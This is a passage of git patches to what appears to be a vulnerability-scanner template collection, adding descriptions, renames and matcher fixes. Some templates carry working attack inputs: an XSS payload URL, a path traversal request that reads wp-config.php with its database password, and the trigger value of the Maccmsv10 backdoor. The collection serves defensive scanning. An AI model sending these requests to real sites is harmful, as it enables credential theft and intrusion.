+4,7 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers> + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server reference: https://www.exploit-db.com/exploits/49986 tags: solarlog,auth-bypass From 058d859cd849f2047d5df2f2201b1007213bec66 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 12:45:23 +0300 Subject: [PATCH 3205/4083] Add description --- vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 63829a085e..e4cb6515af 100644 --- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -4,6 +4,7 @@ info: name: WordPress Oxygen-Theme Themes LFI author: 0x_Akoko severity: high + description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. tags: wordpress,wp-theme,lfi reference: https://cxsecurity.com/issue/WLB-2019030178 From e453bfcb192a6d6fe15aea85b1b2fd38dbf5ed32 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 26 Oct 2021 15:17:36 +0530 Subject: [PATCH 3206/4083] Update redis-commander-exposure.yaml --- exposed-panels/redis-commander-exposure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml index fea8a67df6..0a0ee65364 100644 --- a/exposed-panels/redis-commander-exposure.yaml +++ b/exposed-panels/redis-commander-exposure.yaml @@ -7,7 +7,7 @@ info: reference: - https://joeferner.github.io/redis-commander/ - https://github.com/joeferner/redis-commander - tags: panel + tags: panel,redis requests: - method: GET @@ -16,7 +16,7 @@ requests: matchers: - type: word + condition: and words: - "Redis Commander" - "redisCommanderBearerToken" - condition: and From 751e90311e336b8aeee13d0092e876b4702d446a Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Tue, 26 Oct 2021 15:20:38 +0530 Subject: [PATCH 3207/4083] Update sugarcrm-panel.yaml --- exposed-panels/sugarcrm-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml index cd23c86b30..2ee96c18fc 100644 --- a/exposed-panels/sugarcrm-panel.yaml +++ b/exposed-panels/sugarcrm-panel.yaml @@ -13,12 +13,13 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/index.php?action=Login&module=Users" + stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: - "<title>SugarCRM" - part: body - type: status status: From ca66969963b59811d8a2cfc337bfa6571b52f3ab Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 26 Oct 2021 15:22:18 +0530 Subject: [PATCH 3208/4083] Update CNVD-2019-06255.yaml --- cnvd/CNVD-2019-06255.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml index 82b7c18ae9..9cebd8d7b0 100644 --- a/cnvd/CNVD-2019-06255.yaml +++ b/cnvd/CNVD-2019-06255.yaml @@ -1,4 +1,5 @@ id: CNVD-2019-06255 + info: name: CatfishCMS RCE author: Lark-Lab @@ -18,9 +19,9 @@ requests: - 200 - type: word + condition: and words: - 'OS' - 'PATH' - 'SHELL' - 'USER' - condition: and From 0de8bc19f887b99460cd5498991be772ab40d465 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 17:39:26 +0530 Subject: [PATCH 3209/4083] misc template updates --- ...-user-enumeration.yaml => gitlab-graphql-user-enum.yaml} | 6 +++--- ...{gitlab-user-open-api.yaml => gitlab-api-user-enum.yaml} | 6 +++--- .../{gitlab-user-enumeration.yaml => gitlab-user-enum.yaml} | 5 ++--- 3 files changed, 8 insertions(+), 9 deletions(-) rename misconfiguration/gitlab/{gitlab-user-enumeration.yaml => gitlab-graphql-user-enum.yaml} (86%) rename vulnerabilities/gitlab/{gitlab-user-open-api.yaml => gitlab-api-user-enum.yaml} (93%) rename vulnerabilities/gitlab/{gitlab-user-enumeration.yaml => gitlab-user-enum.yaml} (90%) diff --git a/misconfiguration/gitlab/gitlab-user-enumeration.yaml b/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml similarity index 86% rename from misconfiguration/gitlab/gitlab-user-enumeration.yaml rename to misconfiguration/gitlab/gitlab-graphql-user-enum.yaml index c390d4e905..21a0f3a5ee 100644 --- a/misconfiguration/gitlab/gitlab-user-enumeration.yaml +++ b/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml @@ -1,10 +1,10 @@ -id: gitlab-user-enumeration +id: gitlab-graphql-user-enum info: - name: Gitlab User enumeration + name: Gitlab User enumeration via Graphql API author: pikpikcu severity: info - tags: gitlab,enumeration + tags: gitlab,enum requests: - method: POST diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-api-user-enum.yaml similarity index 93% rename from vulnerabilities/gitlab/gitlab-user-open-api.yaml rename to vulnerabilities/gitlab/gitlab-api-user-enum.yaml index 8302f25e2a..3b80afca18 100644 --- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml +++ b/vulnerabilities/gitlab/gitlab-api-user-enum.yaml @@ -1,4 +1,4 @@ -id: gitlab-user-open-api +id: gitlab-api-user-enum info: author: Suman_Kar @@ -15,19 +15,19 @@ requests: Accept: application/json, text/plain, */* Referer: {{BaseURL}} - threads: 50 payloads: uid: helpers/wordlists/numbers.txt + stop-at-first-match: true matchers-condition: and matchers: - type: regex part: body + condition: and regex: - "username.*" - "id.*" - "name.*" - condition: and - type: word part: header diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enum.yaml similarity index 90% rename from vulnerabilities/gitlab/gitlab-user-enumeration.yaml rename to vulnerabilities/gitlab/gitlab-user-enum.yaml index 869b0ddd14..3c6e37257c 100644 --- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml +++ b/vulnerabilities/gitlab/gitlab-user-enum.yaml @@ -1,4 +1,4 @@ -id: gitlab-user-enumeration +id: gitlab-user-enum info: author: Suman_Kar @@ -16,10 +16,9 @@ requests: Accept: application/json, text/plain, */* Referer: {{BaseURL}} - threads: 50 payloads: user: helpers/wordlists/user-list.txt - + stop-at-first-match: true matchers-condition: and matchers: From 0f1a9cf2b5490da55a49bb0a9408532ff9030857 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Oct 2021 12:10:09 +0000 Subject: [PATCH 3210/4083] Auto README Update [Tue Oct 26 12:10:09 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 46fe32d081..28bf53d46e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2443 files**. +**177 directories, 2446 files**. From 7d0c8669a3af38d1fb51f7d03bb35d4cdfe00d27 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:22:21 +0300 Subject: [PATCH 3211/4083] Add description --- vulnerabilities/other/maccmsv10-backdoor.yaml | 1 + vulnerabilities/other/rockmongo-xss.yaml | 1 + vulnerabilities/other/ruijie-networks-lfi.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/vulnerabilities/other/maccmsv10-backdoor.yaml b/vulnerabilities/other/maccmsv10-backdoor.yaml index 9084b5c2ed..249495b4ed 100644 --- a/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -3,6 +3,7 @@ info: name: Maccmsv10 Backdoor author: princechaddha severity: critical + description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'. tags: maccmsv10,rce requests: diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml index d23d822656..e4395968ad 100644 --- a/vulnerabilities/other/rockmongo-xss.yaml +++ b/vulnerabilities/other/rockmongo-xss.yaml @@ -4,6 +4,7 @@ info: name: RockMongo V1.1.8 XSS author: pikpikcu severity: medium + description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/other/ruijie-networks-lfi.yaml index 03dde58789..94f932e9bf 100644 --- a/vulnerabilities/other/ruijie-networks-lfi.yaml +++ b/vulnerabilities/other/ruijie-networks-lfi.yaml @@ -4,6 +4,7 @@ info: name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI author: pikpikcu severity: high + description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. reference: https://exploit-db.com/exploits/48755 tags: ruijie,lfi From dcf402cfa49902c3b16d41c73b9df4c234adbb50 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:23:43 +0300 Subject: [PATCH 3212/4083] Add description --- vulnerabilities/other/zimbra-preauth-ssrf.yaml | 1 + vulnerabilities/other/zms-auth-bypass.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index d1deffe075..cb99a3ac7a 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html tags: zimbra,ssrf,oast diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 65c7df9984..38a20c3a9a 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -4,6 +4,7 @@ info: name: Zoo Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high + description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. reference: https://www.exploit-db.com/exploits/48880 tags: auth-bypass,zms From 4c0e8bae7e1fe9d5098fe22c28b86dd317e5ce83 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:24:26 +0300 Subject: [PATCH 3213/4083] Add description --- vulnerabilities/other/zhiyuan-oa-session-leak.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml index 71580aab21..deccd94de0 100644 --- a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml +++ b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml @@ -1,9 +1,10 @@ id: zhiyuan-oa-session-leak info: - name: Zhiyuan Oa Session Leak + name: Zhiyuan OA Session Leak author: pikpikcu severity: medium + description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. reference: https://www.zhihuifly.com/t/topic/3345 tags: zhiyuan,leak,disclosure From 57bae34cb98d6c69d8a78c974a768fc39158a7e4 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:25:34 +0300 Subject: [PATCH 3214/4083] Add description --- vulnerabilities/other/yarn-resourcemanager-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 2cd230f11f..1189161af1 100644 --- a/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -5,6 +5,7 @@ info: author: pdteam severity: low tags: apache,rce + description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 requests: From 8adbf37ab49a157d42b569c6644958f60e27af78 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:26:10 +0300 Subject: [PATCH 3215/4083] Add description --- vulnerabilities/other/yapi-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index 92f0058339..e9f9d9d864 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: critical tags: yapi,rce + description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b From 5d98d22416eaec4749865a1ca1adac9616abd36f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:27:16 +0300 Subject: [PATCH 3216/4083] Add description --- vulnerabilities/other/metinfo-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index afe3572164..fca0ca4919 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -4,6 +4,7 @@ info: author: pikpikcu severity: high reference: https://paper.seebug.org/676/ + description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content. tags: metinfo,lfi requests: From 25f7c812c260f6a91021be455a111bb72393bedb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:27:57 +0300 Subject: [PATCH 3217/4083] Add description --- vulnerabilities/other/opensns-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml index 5bccb904ea..8935365a70 100644 --- a/vulnerabilities/other/opensns-rce.yaml +++ b/vulnerabilities/other/opensns-rce.yaml @@ -4,6 +4,7 @@ info: name: OpenSNS Remote Code Execution Vulnerability author: gy741 severity: critical + description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint. reference: - http://www.0dayhack.net/index.php/2417/ - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E From 093a495b5f289cdf1a256b065685c57c8144e6e6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:28:43 +0300 Subject: [PATCH 3218/4083] Add description --- vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 7d1c7a4706..e2fc51ac29 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -4,6 +4,7 @@ info: name: Sonicwall SSLVPN ShellShock RCE author: PR3R00T severity: critical + description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands. reference: - https://twitter.com/chybeta/status/1353974652540882944 - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ From c9efc02223ae079e2aafb12a225238b1d1e2c443 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:29:20 +0300 Subject: [PATCH 3219/4083] Add description --- vulnerabilities/other/seacms-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/seacms-rce.yaml b/vulnerabilities/other/seacms-rce.yaml index 9566dc21e3..7f2dbaec18 100644 --- a/vulnerabilities/other/seacms-rce.yaml +++ b/vulnerabilities/other/seacms-rce.yaml @@ -3,6 +3,7 @@ info: name: SeaCMS V6.4.5 RCE author: pikpikcu severity: high + description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce From 3893a0b6fb520e5b8065c7284d432b62db6d4141 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 26 Oct 2021 22:48:33 +0530 Subject: [PATCH 3220/4083] Create ibm-sterling-detect.yaml --- technologies/ibm/ibm-sterling-detect.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/ibm/ibm-sterling-detect.yaml diff --git a/technologies/ibm/ibm-sterling-detect.yaml b/technologies/ibm/ibm-sterling-detect.yaml new file mode 100644 index 0000000000..54d913fbc7 --- /dev/null +++ b/technologies/ibm/ibm-sterling-detect.yaml @@ -0,0 +1,24 @@ +id: ibm-sterling-detect + +info: + name: IBM Sterling File Gateway Detect + author: princechaddha + severity: info + tags: tech,sterling,ibm + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Welcome to IBM Sterling File Gateway" + + - type: status + status: + - 200 From 09156e1a2a6196549feace19712a29d390dc41bd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 17:18:56 +0000 Subject: [PATCH 3221/4083] Auto README Update [Tue Oct 26 17:18:56 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 28bf53d46e..c3857fb33d 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2446 files**. +**177 directories, 2447 files**. </td> </tr> From 9a371a6a25ce49b1407b824fae6c559cefedfeb8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 22:49:13 +0530 Subject: [PATCH 3222/4083] Rename technologies/ibm-http-server.yaml to technologies/ibm/ibm-http-server.yaml --- technologies/{ => ibm}/ibm-http-server.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => ibm}/ibm-http-server.yaml (100%) diff --git a/technologies/ibm-http-server.yaml b/technologies/ibm/ibm-http-server.yaml similarity index 100% rename from technologies/ibm-http-server.yaml rename to technologies/ibm/ibm-http-server.yaml From 639ba3a0681cd6ec77515df348d31b860b2a6bca Mon Sep 17 00:00:00 2001 From: Philippe Delteil <pdelteil@gmail.com> Date: Tue, 26 Oct 2021 14:43:24 -0300 Subject: [PATCH 3223/4083] Update cname-service-detection.yaml Example nuclei -t cname-service-detection.yaml -u https://www.start.onlyfans.com --- dns/cname-service-detection.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/dns/cname-service-detection.yaml b/dns/cname-service-detection.yaml index dea6bbb752..20997548e8 100644 --- a/dns/cname-service-detection.yaml +++ b/dns/cname-service-detection.yaml @@ -28,4 +28,8 @@ dns: - type: word name: announcekit words: - - "cname.announcekit.app" \ No newline at end of file + - "cname.announcekit.app" + - type: word + name: wix + words: + - "wixdns.net" From cd9195b7e4e33e01951658987c60a9e23f26401e Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:48:28 +0530 Subject: [PATCH 3224/4083] Update wildcard-postmessage.yaml --- misconfiguration/wildcard-postmessage.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/misconfiguration/wildcard-postmessage.yaml b/misconfiguration/wildcard-postmessage.yaml index dd396fc711..124d43b8f9 100644 --- a/misconfiguration/wildcard-postmessage.yaml +++ b/misconfiguration/wildcard-postmessage.yaml @@ -13,6 +13,6 @@ requests: - '{{BaseURL}}' matchers: - - type: word - words: - - "postMessage(msg,'*')" + - type: regex + regex: + - postMessage\([a-zA-Z]+,["']\*["']\) From 4b3c46a773f38fe6cd936eddd5dc1c7842d1dd37 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:51:04 +0530 Subject: [PATCH 3225/4083] Update CVE-2016-1000136.yaml --- cves/2016/CVE-2016-1000136.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml index b939c0b525..e03020ec96 100644 --- a/cves/2016/CVE-2016-1000136.yaml +++ b/cves/2016/CVE-2016-1000136.yaml @@ -1,23 +1,25 @@ id: CVE-2016-1000136 info: - name: heat-trackr v1.0 - Reflected Cross-Site Scripting (XSS) via heat-trackr_abtest_add.php + name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php author: daffainfo severity: medium description: Reflected XSS in wordpress plugin heat-trackr v1.0 - reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '"><script>alert(1);</script><"' + - '</script><script>alert(document.domain)</script>' part: body - type: word From 0ff78c8a845fc50f8f66b12ffd7cf692cac5efea Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:52:04 +0530 Subject: [PATCH 3226/4083] Update sugarcrm-panel.yaml --- exposed-panels/sugarcrm-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml index 2ee96c18fc..6edf2c347c 100644 --- a/exposed-panels/sugarcrm-panel.yaml +++ b/exposed-panels/sugarcrm-panel.yaml @@ -3,8 +3,8 @@ id: sugarcrm-panel info: name: Detect SugarCRM Panel author: johnk3r - reference: https://www.shodan.io/search?query=sugarcrm severity: info + reference: https://www.shodan.io/search?query=sugarcrm tags: sugarcrm,panel requests: From ab633f8675bf686ba32c97f3bf112e12a50f456a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:55:34 +0530 Subject: [PATCH 3227/4083] Update and rename wp-javospot-premium-theme-lfi.yaml to vulnerabilities/wordpress/wp-javospot-lfi.yaml --- .../wordpress/wp-javospot-lfi.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) rename wp-javospot-premium-theme-lfi.yaml => vulnerabilities/wordpress/wp-javospot-lfi.yaml (51%) diff --git a/wp-javospot-premium-theme-lfi.yaml b/vulnerabilities/wordpress/wp-javospot-lfi.yaml similarity index 51% rename from wp-javospot-premium-theme-lfi.yaml rename to vulnerabilities/wordpress/wp-javospot-lfi.yaml index d616291a71..2cd2daec41 100644 --- a/wp-javospot-premium-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-javospot-lfi.yaml @@ -1,24 +1,27 @@ -id: wp-javospot-premium-theme-lfi +id: wp-javospot-lfi info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko severity: high + reference: + - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/ + - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab + - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 tags: wordpress,wp-theme,lfi,wp - reference: https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin-ajax.php? jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - part: body condition: and - type: status From 8178635b45d9644be420c6c558e52e4834e7462a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 26 Oct 2021 23:58:12 +0530 Subject: [PATCH 3228/4083] Update CVE-2015-5471.yaml --- cves/2015/CVE-2015-5471.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml index c2d47397d1..050eb00614 100644 --- a/cves/2015/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -3,7 +3,11 @@ info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko severity: high - reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. + reference: + - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + - http://www.vapid.dhs.org/advisory.php?v=134 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 tags: cve,cve2015,wordpress,wp-plugin,lfi requests: From 2c6367720e6eb8466e7d0f137aac0ec435bc0daa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 18:30:55 +0000 Subject: [PATCH 3229/4083] Auto Generated CVE annotations [Tue Oct 26 18:30:55 UTC 2021] :robot: --- cves/2016/CVE-2016-1000136.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2016/CVE-2016-1000136.yaml b/cves/2016/CVE-2016-1000136.yaml index e03020ec96..3adf484b9b 100644 --- a/cves/2016/CVE-2016-1000136.yaml +++ b/cves/2016/CVE-2016-1000136.yaml @@ -9,6 +9,11 @@ info: - http://www.vapidlabs.com/wp/wp_advisory.php?v=798 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136 tags: cve,cve2016,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2016-1000136 + cwe-id: CWE-79 requests: - method: GET From 7ccaf4c07a7f4a495f7427a39d445abe276b50b3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 18:33:18 +0000 Subject: [PATCH 3230/4083] Auto Generated CVE annotations [Tue Oct 26 18:33:18 UTC 2021] :robot: --- cves/2015/CVE-2015-5471.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml index 050eb00614..37ed1b5e40 100644 --- a/cves/2015/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -2,13 +2,18 @@ id: CVE-2015-5471 info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 tags: cve,cve2015,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2015-5471 + cwe-id: CWE-22 requests: - method: GET From b928d9a269d291061959bbe3f273b2a661a0c295 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Wed, 27 Oct 2021 00:11:48 +0530 Subject: [PATCH 3231/4083] Update and rename wp-tinymce-thumbnail-plugin-lfi.yaml to wp-tinymce-lfi.yaml --- ...-thumbnail-plugin-lfi.yaml => wp-tinymce-lfi.yaml} | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) rename vulnerabilities/wordpress/{wp-tinymce-thumbnail-plugin-lfi.yaml => wp-tinymce-lfi.yaml} (56%) diff --git a/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml b/vulnerabilities/wordpress/wp-tinymce-lfi.yaml similarity index 56% rename from vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml rename to 